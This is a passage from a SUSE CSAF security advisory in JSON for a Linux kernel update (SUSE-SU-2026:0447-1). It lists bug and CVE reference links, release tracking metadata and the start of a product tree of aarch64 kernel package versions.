"category": "self",
"summary": "SUSE Bug 1256742",
"url": "https://bugzilla.suse.com/1256742"
},
{
"category": "self",
"summary": "SUSE Bug 1256744",
"url": "https://bugzilla.suse.com/1256744"
},
{
"category": "self",
"summary": "SUSE Bug 1256748",
"url": "https://bugzilla.suse.com/1256748"
},
{
"category": "self",
"summary": "SUSE Bug 1256749",
"url": "https://bugzilla.suse.com/1256749"
},
{
"category": "self",
"summary": "SUSE Bug 1256752",
"url": "https://bugzilla.suse.com/1256752"
},
{
"category": "self",
"summary": "SUSE Bug 1256754",
"url": "https://bugzilla.suse.com/1256754"
},
{
"category": "self",
"summary": "SUSE Bug 1256756",
"url": "https://bugzilla.suse.com/1256756"
},
{
"category": "self",
"summary": "SUSE Bug 1256757",
"url": "https://bugzilla.suse.com/1256757"
},
{
"category": "self",
"summary": "SUSE Bug 1256759",
"url": "https://bugzilla.suse.com/1256759"
},
{
"category": "self",
"summary": "SUSE Bug 1256760",
"url": "https://bugzilla.suse.com/1256760"
},
{
"category": "self",
"summary": "SUSE Bug 1256761",
"url": "https://bugzilla.suse.com/1256761"
},
{
"category": "self",
"summary": "SUSE Bug 1256763",
"url": "https://bugzilla.suse.com/1256763"
},
{
"category": "self",
"summary": "SUSE Bug 1256770",
"url": "https://bugzilla.suse.com/1256770"
},
{
"category": "self",
"summary": "SUSE Bug 1256773",
"url": "https://bugzilla.suse.com/1256773"
},
{
"category": "self",
"summary": "SUSE Bug 1256774",
"url": "https://bugzilla.suse.com/1256774"
},
{
"category": "self",
"summary": "SUSE Bug 1256777",
"url": "https://bugzilla.suse.com/1256777"
},
{
"category": "self",
"summary": "SUSE Bug 1256779",
"url": "https://bugzilla.suse.com/1256779"
},
{
"category": "self",
"summary": "SUSE Bug 1256781",
"url": "https://bugzilla.suse.com/1256781"
},
{
"category": "self",
"summary": "SUSE Bug 1256785",
"url": "https://bugzilla.suse.com/1256785"
},
{
"category": "self",
"summary": "SUSE Bug 1256792",
"url": "https://bugzilla.suse.com/1256792"
},
{
"category": "self",
"summary": "SUSE Bug 1256794",
"url": "https://bugzilla.suse.com/1256794"
},
{
"category": "self",
"summary": "SUSE Bug 1256861",
"url": "https://bugzilla.suse.com/1256861"
},
{
"category": "self",
"summary": "SUSE Bug 1256863",
"url": "https://bugzilla.suse.com/1256863"
},
{
"category": "self",
"summary": "SUSE Bug 1257035",
"url": "https://bugzilla.suse.com/1257035"
},
{
"category": "self",
"summary": "SUSE Bug 1257053",
"url": "https://bugzilla.suse.com/1257053"
},
{
"category": "self",
"summary": "SUSE Bug 1257154",
"url": "https://bugzilla.suse.com/1257154"
},
{
"category": "self",
"summary": "SUSE Bug 1257155",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "self",
"summary": "SUSE Bug 1257158",
"url": "https://bugzilla.suse.com/1257158"
},
{
"category": "self",
"summary": "SUSE Bug 1257163",
"url": "https://bugzilla.suse.com/1257163"
},
{
"category": "self",
"summary": "SUSE Bug 1257164",
"url": "https://bugzilla.suse.com/1257164"
},
{
"category": "self",
"summary": "SUSE Bug 1257167",
"url": "https://bugzilla.suse.com/1257167"
},
{
"category": "self",
"summary": "SUSE Bug 1257168",
"url": "https://bugzilla.suse.com/1257168"
},
{
"category": "self",
"summary": "SUSE Bug 1257180",
"url": "https://bugzilla.suse.com/1257180"
},
{
"category": "self",
"summary": "SUSE Bug 1257202",
"url": "https://bugzilla.suse.com/1257202"
},
{
"category": "self",
"summary": "SUSE Bug 1257204",
"url": "https://bugzilla.suse.com/1257204"
},
{
"category": "self",
"summary": "SUSE Bug 1257207",
"url": "https://bugzilla.suse.com/1257207"
},
{
"category": "self",
"summary": "SUSE Bug 1257208",
"url": "https://bugzilla.suse.com/1257208"
},
{
"category": "self",
"summary": "SUSE Bug 1257215",
"url": "https://bugzilla.suse.com/1257215"
},
{
"category": "self",
"summary": "SUSE Bug 1257217",
"url": "https://bugzilla.suse.com/1257217"
},
{
"category": "self",
"summary": "SUSE Bug 1257218",
"url": "https://bugzilla.suse.com/1257218"
},
{
"category": "self",
"summary": "SUSE Bug 1257220",
"url": "https://bugzilla.suse.com/1257220"
},
{
"category": "self",
"summary": "SUSE Bug 1257221",
"url": "https://bugzilla.suse.com/1257221"
},
{
"category": "self",
"summary": "SUSE Bug 1257227",
"url": "https://bugzilla.suse.com/1257227"
},
{
"category": "self",
"summary": "SUSE Bug 1257232",
"url": "https://bugzilla.suse.com/1257232"
},
{
"category": "self",
"summary": "SUSE Bug 1257234",
"url": "https://bugzilla.suse.com/1257234"
},
{
"category": "self",
"summary": "SUSE Bug 1257236",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "self",
"summary": "SUSE Bug 1257245",
"url": "https://bugzilla.suse.com/1257245"
},
{
"category": "self",
"summary": "SUSE Bug 1257277",
"url": "https://bugzilla.suse.com/1257277"
},
{
"category": "self",
"summary": "SUSE Bug 1257282",
"url": "https://bugzilla.suse.com/1257282"
},
{
"category": "self",
"summary": "SUSE Bug 1257296",
"url": "https://bugzilla.suse.com/1257296"
},
{
"category": "self",
"summary": "SUSE Bug 1257473",
"url": "https://bugzilla.suse.com/1257473"
},
{
"category": "self",
"summary": "SUSE Bug 1257603",
"url": "https://bugzilla.suse.com/1257603"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-53714 page",
"url": "https://www.suse.com/security/cve/CVE-2023-53714/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-54013 page",
"url": "https://www.suse.com/security/cve/CVE-2023-54013/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-27005 page",
"url": "https://www.suse.com/security/cve/CVE-2024-27005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-42103 page",
"url": "https://www.suse.com/security/cve/CVE-2024-42103/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53070 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53070/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53149 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-56721 page",
"url": "https://www.suse.com/security/cve/CVE-2024-56721/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22047 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22047/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37744 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37744/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37751 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37751/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-37813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-37813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38209 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38209/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38243 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38243/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38322 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38322/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38539 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38539/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39689 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39689/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39829 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39829/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39836 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39836/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39880 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39880/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-39913 page",
"url": "https://www.suse.com/security/cve/CVE-2025-39913/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40106 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40106/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40166 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40166/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40177 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40177/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40181 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40181/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40202 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40202/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40238 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40238/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40257 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40257/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40259 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40264 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40328 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40328/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40350 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40350/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40355 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40355/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-40363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-40363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68171 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68171/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68174 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68174/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68178 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68178/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68188 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68188/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68200 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68200/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68215 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68215/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68227 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68227/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68241 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68241/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68245 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68245/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68254 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68254/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68256 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68256/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68261 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68261/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68296 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68296/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68297 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68297/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68301 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68301/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68320 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68320/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68325 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68325/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68327 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68327/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68337 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68337/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68349 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68349/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68363 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68363/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68365 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68365/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68366 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68366/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68367 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68367/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68372 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68372/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68379 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68379/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68725 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68725/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68727 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68727/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68728 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68728/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68733 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68733/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68764 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68764/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68768 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68768/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68770 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68770/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68771 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68771/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68773 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68773/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68775 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68775/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68776 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68776/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68777 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68777/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68783 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68783/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68788 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68788/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68789 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68789/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68795 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68795/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68797 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68797/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68798/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68800 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68800/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68801 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68802 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68802/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68803 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68803/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68804 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68804/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68808 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68808/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68814 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68814/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68815 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68815/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68816 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68816/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68819 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68819/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68820 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71064 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71064/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71066 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71066/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71076 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71076/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71077 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71077/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71078 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71078/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71079 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71079/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71080 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71080/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71081 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71081/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71082 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71082/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71083 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71083/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71084 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71084/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71086 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71086/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71087 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71087/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71088 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71088/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71089 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71089/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71091 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71091/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71093 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71093/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71094 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71094/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71095 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71095/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71096 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71096/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71097 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71097/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71098 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71098/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71099 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71099/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71100 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71100/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71101 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71101/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71108 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71108/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71111 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71111/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71112 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71112/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71114 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71114/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71116 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71116/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71118 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71118/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71119 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71119/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71120 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71120/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71123 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71123/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71130 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71130/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71131 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71132 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71133 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71133/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71135 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71135/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71136 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71136/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71137 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71137/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71138 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71138/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71141 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71141/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71142 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71142/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71143 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71143/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71145 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71145/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71147 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71147/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71149 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71149/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71154 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71154/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71156 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71157 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71157/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71162 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71162/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71163 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71163/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22976 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22976/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22977 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22977/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22978 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22978/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22984 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22984/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22985 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22985/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22988 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22988/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22990 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22990/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22991 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22991/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22992 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22992/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22993 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22993/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22996 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22996/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22997 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22997/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-22999 page",
"url": "https://www.suse.com/security/cve/CVE-2026-22999/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23000 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23000/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23001 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23001/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23005 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23005/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23006 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23006/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-23011 page",
"url": "https://www.suse.com/security/cve/CVE-2026-23011/"
}
],
"title": "Security update for the Linux Kernel",
"tracking": {
"current_release_date": "2026-02-11T14:05:07Z",
"generator": {
"date": "2026-02-11T14:05:07Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:0447-1",
"initial_release_date": "2026-02-11T14:05:07Z",
"revision_history": [
{
"date": "2026-02-11T14:05:07Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "cluster-md-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "cluster-md-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product_id": "cluster-md-kmp-64kb-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product_id": "cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dlm-kmp-64kb-6.4.0-150700.53.31.1.aarch64",
"product_id": "dlm-kmp-64kb-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"product_id": "dlm-kmp-default-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-allwinner-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-allwinner-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-allwinner-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
"name": "dtb-altera-6.4.0-150700.53.31.1.aarch64",
"product": {
"name": "dtb-altera-6.4.0-150700.53.31.1.aarch64",
"product_id": "dtb-altera-6.4.0-150700.53.31.1.aarch64"
}
},
{
"category": "product_version",
